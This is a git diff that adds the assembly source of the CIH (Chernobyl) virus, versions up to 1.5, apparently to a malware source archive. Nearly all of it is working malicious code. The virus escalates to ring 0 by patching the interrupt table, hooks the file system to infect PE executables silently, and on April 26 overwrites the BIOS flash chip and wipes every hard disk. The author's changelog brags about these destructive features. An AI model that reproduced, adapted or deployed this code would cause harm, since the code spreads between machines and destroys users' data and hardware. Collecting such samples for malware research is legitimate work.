* +; ************************************* + test cl, 01h + jz OpenFile +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Open File * +; ************************************* +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + xchg ebx, eax ; mov ebx, FileHandle +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + pop ecx + pushf + test cl, 01h + jz IsOpenFileOK +; ************************************* +; * Restore Attributes of the File * +; ************************************* + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Is Open File OK !? * +; ************************************* +IsOpenFileOK: + popf + jc DisableOnBusy +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + push esi ; Push FileNameBuffer Address to Stack + pushf ; Now CF = 0, Push Flag to Stack + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer +; *************************** +; * Get OffsetToNewHeader * +; *************************** + xor eax, eax + mov ah, 0d6h + + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + xor ecx, ecx + mov cl, 04h + xor edx, edx + mov dl, 3ch + call edi ; VXDCall IFSMgr_Ring0_FileIO + mov edx, [esi] +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + dec edx + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? 
* +; *************************** + ; cmp [esi], '\0PE\0' + cmp dword ptr [esi], 00455000h + jne CloseFile +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + push ebx ; Save File Handle + push 00h ; Set VirusCodeSectionTableEndMark +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer +; *************************** +; * Save ESP Register * +; *************************** + mov dr1, esp +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + push eax ; Size +; 
*************************** +; * Let's Read * +; * Image Header in File * +; *************************** + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + mov al, SizeOfScetionTable + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + mul cl +; *************************** +; * Let's Set Section Table * +; *************************** + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + inc ecx + push ecx ; Save NumberOfSections+1 + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + add ecx, eax + add ecx, edx + sub ecx, (SizeOfHeaders-@9)[esi] + jnc short OnlySetInfectedMark + not ecx + inc ecx + cmp cx, small CodeSizeOfMergeVirusCodeSection + jb OnlySetInfectedMark +; *************************** +; * Save Original * +; * Address of Entry Point * +; *************************** + ; Save My Virus First Section Code + ; Size of Following Section Table... 
+ ; ( Not Include the Size of Virus Code Section Table ) + push ecx + xchg ecx, eax ; ECX = Size of Section Table + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax +; *************************** +; * Read All Section Tables * +; *************************** + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + push edi ; Size + add edx, eax + push edx ; Pointer of File + add eax, esi + push eax ; Address of Buffer +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + lea eax, [eax+edi-04h] + mov [eax], ebx +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + push ebx ; Size + add edx, edi + push edx ; Pointer of File + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + mov (NewAddressOfEntryPoint-@9)[esi], edx +; *************************** +; * Setup Initial Data * +; *************************** + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + jmp StartToWriteCodeToSections +; *************************** +; * Write Code to Sections * +; *************************** +LoopOfWriteCodeToSections: + add edx, SizeOfScetionTable + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + push ebx ; Size + sub eax, 08h + mov [eax], ebx + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + push edi ; 
Address of Buffer + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h +StartToWriteCodeToSections: + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + add edi, ebx ; Move Address of Buffer +EndOfWriteCodeToSections: + loop LoopOfWriteCodeToSections +; *************************** +; * Only Set Infected Mark * +; *************************** +OnlySetInfectedMark: + mov esp, dr1 + jmp WriteVirusCodeToFile +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. 
^__^ * +; *************************** + lea eax, (LastVxDCallAddress-2-@9)[esi] + mov cl, VxDCallTableSize +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] + mov [eax+2], edx + movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] + sub eax, edx + loop LoopOfRestoreVxDCallID +; *************************** +; * Let's Write * +; * Virus Code to the File * +; *************************** +WriteVirusCodeToFile: + mov eax, dr1 + mov ebx, [eax+10h] + mov edi, [eax] +LoopOfWriteVirusCodeToFile: + pop ecx + jecxz SetFileModificationMark + mov esi, ecx + mov eax, 0d601h + pop edx + pop ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + jmp LoopOfWriteVirusCodeToFile +; *************************** +; * Let's Set CF = 1 ==> * +; * Need to Restore File * +; * Modification Time * +; *************************** +SetFileModificationMark: + pop ebx + pop eax + stc ; Enable CF(Carry Flag) + pushf +; ************************************* +; * Close File * +; ************************************* +CloseFile: + xor eax, eax + mov ah, 0d7h + call edi ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Need to Restore File Modification * +; * Time !? 
* +; ************************************* + popf + pop esi + jnc IsKillComputer +; ************************************* +; * Restore File Modification Time * +; ************************************* + mov ebx, edi + mov ax, 4303h + mov ecx, (FileModificationTime-@7)[esi] + mov edi, (FileModificationTime+2-@7)[esi] + call ebx ; VXDCall IFSMgr_Ring0_FileIO +; ************************************* +; * Disable OnBusy * +; ************************************* +DisableOnBusy: + dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy +; ************************************* +; * Call Previous FileSystemApiHook * +; ************************************* +prevhook: + popad + mov eax, dr0 ; + jmp [eax] ; Jump to prevhook +; ************************************* +; * Call the Function that the IFS * +; * Manager Would Normally Call to * +; * Implement this Particular I/O * +; * Request. * +; ************************************* +pIFSFunc: + mov ebx, esp + push dword ptr [ebx+20h+04h+14h] ; Push pioreq + call [ebx+20h+04h] ; Call pIFSFunc + pop ecx ; + mov [ebx+1ch], eax ; Modify EAX Value in Stack +; *************************** +; * After Calling pIFSFunc, * +; * Get Some Data from the * +; * Returned pioreq. * +; *************************** + cmp dword ptr [ebx+20h+04h+04h], 00000024h + jne QuitMyVirusFileSystemHook +; ***************** +; * Get the File * +; * Modification * +; * Date and Time * +; * in DOS Format.* +; ***************** + mov eax, [ecx+28h] + mov (FileModificationTime-@6)[esi], eax +; *************************** +; * Quit My Virus' * +; * IFSMgr_FileSystemHook * +; *************************** +QuitMyVirusFileSystemHook: + popad + ret +; ************************************* +; * Kill Computer !? ... *^_^* * +; ************************************* +IsKillComputer: + ; Get Now Month from BIOS CMOS + mov ax, 0708h + out 70h, al + in al, 71h + xchg ah, al + + ; Get Now Day from BIOS CMOS + out 70h, al + in al, 71h + xor ax, 0426h ; 04/26/???? 
+ jne DisableOnBusy +; ************************************** +; * Kill Kill Kill Kill Kill Kill Kill * +; ************************************** + +; *************************** +; * Kill BIOS EEPROM * +; *************************** + mov bp, 0cf8h + lea esi, IOForEEPROM-@7[esi] +; *********************** +; * Show BIOS Page in * +; * 000E0000 - 000EFFFF * +; * ( 64 KB ) * +; *********************** + mov edi, 8000384ch + mov dx, 0cfeh + cli + call esi +; *********************** +; * Show BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + mov di, 0058h + dec edx ; and al,0fh + mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h + call esi +; *********************** +; * Show the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E01FF * +; * ( 512 Bytes ) * +; * , and the Section * +; * of Extra BIOS can * +; * be Writted... * +; *********************** + lea ebx, EnableEEPROMToWrite-@10[esi] + mov eax, 0e5555h + mov ecx, 0e2aaah + call ebx + mov byte ptr [eax], 60h + push ecx + loop $ +; *********************** +; * Kill the BIOS Extra * +; * ROM Data in Memory * +; * 000E0000 - 000E007F * +; * ( 80h Bytes ) * +; *********************** + xor ah, ah + mov [eax], al + xchg ecx, eax + loop $ +; *********************** +; * Show and Enable the * +; * BIOS Main ROM Data * +; * 000E0000 - 000FFFFF * +; * ( 128 KB ) * +; * can be Writted... 
* +; *********************** + mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + loop $ +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + mov ah, 0e0h + mov [eax], al +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + mov esi, esp + sub esp, 0ach +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + cmp word ptr [esi+06h], 0017h + je KillNextDataSection +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + jmp LoopOfKillHardDisk +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + jmp LoopOfKillHardDisk +; *************************** +; * Enable EEPROM to Write * +; *************************** +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + ret +; *************************** +; * IO for EEPROM * +; *************************** +IOForEEPROM: +@10 = IOForEEPROM + xchg eax, edi + xchg edx, ebp + out dx, eax + 
xchg eax, edi + xchg edx, ebp + in al, dx +BooleanCalculateCode = $ + or al, 44h + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + out dx, al + ret +; ********************************************************* +; * Static Data * +; ********************************************************* +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' + db MinorVirusVersion+'0' + db ' TTIT' +; ********************************************************* +; * Virus Size * +; ********************************************************* +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* +; * Dynamic Data * +; ********************************************************* +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? 
+Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* +VirusNeedBaseMemory = $ +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* +VirusGame ENDS + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih15.asm b/MSDOS/Virus.MSDOS.Unknown.cih15.asm new file mode 100644 index 00000000..a03c5e14 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih15.asm 
@@ -0,0 +1,1402 @@
+; ****************************************************************************
+; * The Virus Program Information *
+; ****************************************************************************
+; * *
+; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
+; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net *
+; * Modification Time : 06/01/1998 Version : 1.5 *
+; * *
+; * Turbo Assembler Version 5.0 : Tasm /m cih *
+; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
+; * *
+; *==========================================================================*
+; * Modification History *
+; *==========================================================================*
+; * v1.0 1. Create the Virus Program. *
+; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
+; * 04/26/1998 3. Virus Code doesn't Reload into System. *
+; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
+; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
+; * 6. When System Opens Existing PE File, the File will be *
+; * Infected, and the File doesn't be Reinfected. *
+; * 7. It is also Infected, even the File is Read-Only. *
+; * 8. When the File is Infected, the Modification Date and Time *
+; * of the File also don't be Changed. *
+; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
+; * Previous FileSystemApiHook, it will Call the Function *
+; * that the IFS Manager Would Normally Call to Implement *
+; * this Particular I/O Request. *
+; * 10. The Virus Size is only 656 Bytes. *
+; *==========================================================================*
+; * v1.1 1. Especially, the File that be Infected will not Increase *
+; * it's Size... ^__^ *
+; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
+; * When Exception Error Occurs, Our OS System should be in *
+; * Windows NT. So My Cute Virus will not Continue to Run, *
+; * it will Jmup to Original Application to Run. *
+; * 3. 
Use Better Algorithm, Reduce Virus Code Size. *
+; * 4. The Virus "Basic" Size is only 796 Bytes. *
+; *==========================================================================*
+; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
+; * 2. Modify the Bug of v1.1 *
+; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
+; *==========================================================================*
+; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
+; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
+; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
+; *==========================================================================*
+; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
+; * 2. Change the Date of Killing Computers. *
+; * 05/31/1998 3. Modify Virus Version Copyright. *
+; * 4. The Virus "Basic" Size is 1019 Bytes. *
+; ****************************************************************************
+; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
+; * 2. Modify Virus Version Copyright. *
+; * 06/01/1998 3. Clear Garbage in Source Code. *
+; * 4. The Virus "Small" Size in 10xx Bytes. 
*
+; ****************************************************************************
+
+ .586
+
+; ****************************************************************************
+; * Original PE Executable File(Don't Modify this Section) *
+; ****************************************************************************
+
+OriginalAppEXE SEGMENT
+
+FileHeader:
+ db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
+ db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
+ db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
+ db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
+ db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
+ db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
+ db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
+ db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
+ db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
+ db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
+ db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
+ db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
+ db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
+ db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
+ db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
+ db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 
000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
+ db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
+ db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
+ dd 00000000h, VirusSize
+
+OriginalAppEXE ENDS
+
+; ****************************************************************************
+; * My Virus Game *
+; ****************************************************************************
+
+; 
*********************************************************
+; * Constant Define *
+; *********************************************************
+
+TRUE = 1
+FALSE = 0
+
+DEBUG = TRUE
+
+IF DEBUG
+
+ FirstKillHardDiskNumber = 82h
+ HookExceptionNumber = 06h
+
+ELSE
+
+ FirstKillHardDiskNumber = 81h
+ HookExceptionNumber = 04h
+
+ENDIF
+
+
+FileNameBufferSize = 7fh
+
+; *********************************************************
+; *********************************************************
+
+VirusGame SEGMENT
+
+ ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
+ ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
+
+; *********************************************************
+; * Ring3 Virus Game Initial Program *
+; *********************************************************
+
+MyVirusStart:
+ push ebp
+
+; *************************************
+; * Let's Modify Structured Exception *
+; * Handing, Prevent Exception Error *
+; * Occurrence, Especially in NT. *
+; *************************************
+
+ lea eax, [esp-04h*2]
+ xor ebx, ebx
+ xchg eax, fs:[ebx]
+ call @0
+@0:
+ pop ebx
+ lea ecx, StopToRunVirusCode-@0[ebx]
+ push ecx
+ push eax
+
+; *************************************
+; * Let's Modify *
+; * IDT(Interrupt Descriptor Table) *
+; * to Get Ring0 Privilege... 
*
+; *************************************
+
+ push eax ;
+ sidt [esp-02h] ; Get IDT Base Address
+ pop ebx ;
+ add ebx, HookExceptionNumber*08h+04h ; ZF = 0
+ cli
+ mov ebp, [ebx] ; Get Exception Base
+ mov bp, [ebx-04h] ; Entry Point
+ lea esi, MyExceptionHook-@1[ecx]
+ push esi
+ mov [ebx-04h], si ;
+ shr esi, 16 ; Modify Exception
+ mov [ebx+02h], si ; Entry Point Address
+ pop esi
+
+; *************************************
+; * Generate Exception to Get Ring0 *
+; *************************************
+
+ int HookExceptionNumber ; GenerateException
+ReturnAddressOfEndException = $
+
+; *************************************
+; * Merge All Virus Code Section *
+; *************************************
+
+ push esi
+ mov esi, eax
+
+LoopOfMergeAllVirusCodeSection:
+
+ mov ecx, [eax-04h]
+ rep movsb
+ sub eax, 08h
+ mov esi, [eax]
+ or esi, esi
+ jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
+ jmp LoopOfMergeAllVirusCodeSection
+
+QuitLoopOfMergeAllVirusCodeSection:
+
+ pop esi
+
+; *************************************
+; * Generate Exception Again *
+; *************************************
+
+ int HookExceptionNumber ; GenerateException Again
+
+; *************************************
+; * Let's Restore *
+; * Structured Exception Handing *
+; *************************************
+
+ReadyRestoreSE:
+ sti
+ xor ebx, ebx
+ jmp RestoreSE
+
+; *************************************
+; * When Exception Error Occurs, *
+; * Our OS System should be in NT. *
+; * So My Cute Virus will not *
+; * Continue to Run, it Jmups to *
+; * Original Application to Run. 
*
+; *************************************
+
+StopToRunVirusCode:
+@1 = StopToRunVirusCode
+
+ xor ebx, ebx
+ mov eax, fs:[ebx]
+ mov esp, [eax]
+
+RestoreSE:
+ pop dword ptr fs:[ebx]
+ pop eax
+
+; *************************************
+; * Return Original App to Execute *
+; *************************************
+
+ pop ebp
+ push 00401000h ; Push Original
+OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
+ ret ; Return to Original App Entry Point
+
+; *********************************************************
+; * Ring0 Virus Game Initial Program *
+; *********************************************************
+
+MyExceptionHook:
+@2 = MyExceptionHook
+ jz InstallMyFileSystemApiHook
+
+; *************************************
+; * Do My Virus Exist in System !? *
+; *************************************
+
+ mov ecx, dr0
+ jecxz AllocateSystemMemoryPage
+ add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
+
+; *************************************
+; * Return to Ring3 Initial Program *
+; *************************************
+
+ExitRing0Init:
+ mov [ebx-04h], bp ;
+ shr ebp, 16 ; Restore Exception
+ mov [ebx+02h], bp ;
+ iretd
+
+; *************************************
+; * Allocate SystemMemory Page to Use *
+; *************************************
+
+AllocateSystemMemoryPage:
+
+ mov dr0, ebx ; Set the Mark of My Virus Exist in System
+ push 00000000fh ;
+ push ecx ;
+ push 0ffffffffh ;
+ push ecx ;
+ push ecx ;
+ push ecx ;
+ push 000000001h ;
+ push 000000002h ;
+ int 20h ; VMMCALL _PageAllocate
+_PageAllocate = $ ;
+ dd 00010053h ; Use EAX, ECX, EDX, and flags
+ add esp, 08h*04h
+ xchg edi, eax ; EDI = SystemMemory Start Address
+ lea eax, MyVirusStart-@2[esi]
+ iretd ; Return to Ring3 Initial Program
+
+; *************************************
+; * Install My File System Api Hook *
+; *************************************
+
+InstallMyFileSystemApiHook:
+
+ lea eax, FileSystemApiHook-@6[edi]
+
+ push eax ;
+ int 20h ; VXDCALL 
IFSMgr_InstallFileSystemApiHook
+IFSMgr_InstallFileSystemApiHook = $
